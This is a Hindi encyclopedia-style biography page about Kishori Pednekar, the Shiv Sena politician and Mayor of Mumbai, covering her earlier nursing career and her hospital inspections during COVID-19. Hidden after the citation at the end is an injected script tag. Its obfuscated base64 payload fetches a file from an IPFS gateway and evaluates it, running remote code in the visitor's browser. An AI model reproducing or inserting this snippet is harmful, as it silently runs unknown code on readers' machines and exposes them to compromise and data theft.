किशोरी पेडनेकर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
किशोरी पेडनेकर

किशोरी पेडनेकर (अंग्रेज़ी: Kishori Pednekar, जन्म- 1962) मुम्बई, महाराष्ट्र में शिवसेना की राजनीतिज्ञ तथा मुम्बई की महापौर हैं। अप्रॅल 2020 में जब मुंबई में कोरोना चरम पर था, तब मुंबई की महापौर किशोरी पेडनेकर नायर अस्पताल में नर्स की जिम्मेदारी निभाने पहुंच गईं थीं। उनका सेवाभाव प्रेरणा बन गया। 1992 में शिवसेना की सदस्य बनने से पहले किशोरी पेडनेकर जवाहरलाल नेहरू पोर्ट ट्रस्ट में एक दशक से ज्यादा समय तक नर्स रहीं। मुंबई की 77वीं मेयर किशोरी पेडनेकर सुबह 8 बजे से रात के 2 बजे तक काम करती हैं। वे कहती हैं कि उनकी प्राथमिकता में शहर को साफ और सुरक्षित रखना है।

  • किशोरी पेडनेकर महापौर बनने से पहले प्रवक्ता थीं। इस पद पर रहते हुए वे अपने दल की भूमिका रखती थीं और कई बार तो सुरमयी आरोपों (मुंबई तुला बीएमसी वर भरोसा) का उत्तर भी उन्होंने संगीतमय ढंग से दिया। इन उत्तर-प्रत्युत्तरों में उनका अंदाज औरों से हमेशा अलग रहा है। लेकिन महापौर बनने के बाद पद तो बदल गया पर वे अपनी भूमिका नहीं बदल पाईं।[1]
  • कोरोना काल में महापौर किशोरी पेडनेकर अपना कार्यालय भायखला के रानीबाग से या पेंग्विन कक्ष से संचालित कर रही थीं। लेकिन जब सब कुछ शुरू हो गया और मनपा मुख्यालय में सभी समिति के अध्यक्ष और अधिकारी आने लगे, तब भी किशोरी पेडनेकर रानीबाग के महापौर निवास से ही अपना कार्य संचालन कर रही हैं।
  • किशोरी पेडनेकर कोरोना काल के दौरान अधिक सक्रिय रहकर प्रभावी भी रहीं। उन्होंने अधिकांश सरकारी अस्पतालों में जाकर निरीक्षण किया। स्वास्थ्य अधिकारियों के साथ बैठकें करके उनकी राय, दिक्कतें जानीं। उसके अनुसार प्रशासन में बदलाव के आदेश दिये। इसमें महापौर का अपना अनुभव काम आया। महापौर खुद भी परिचारिका रह चुकी हैं। उनके इस अनुभव का लाभ महामारी काल में लोगों को हुआ है, इसमें दो राय नहीं है। किशोरी पेडनेकर की यह सक्रियता सेवा में दिखी तो वहां पर भी दिख रही है जहां से अब तक के महापौरों ने दूरी बनाए रखी थी।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. महापौर या पार्टी प्रवक्ता? (हिंदी) hindusthanpost.com। अभिगमन तिथि: 09 मार्च, 2020।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख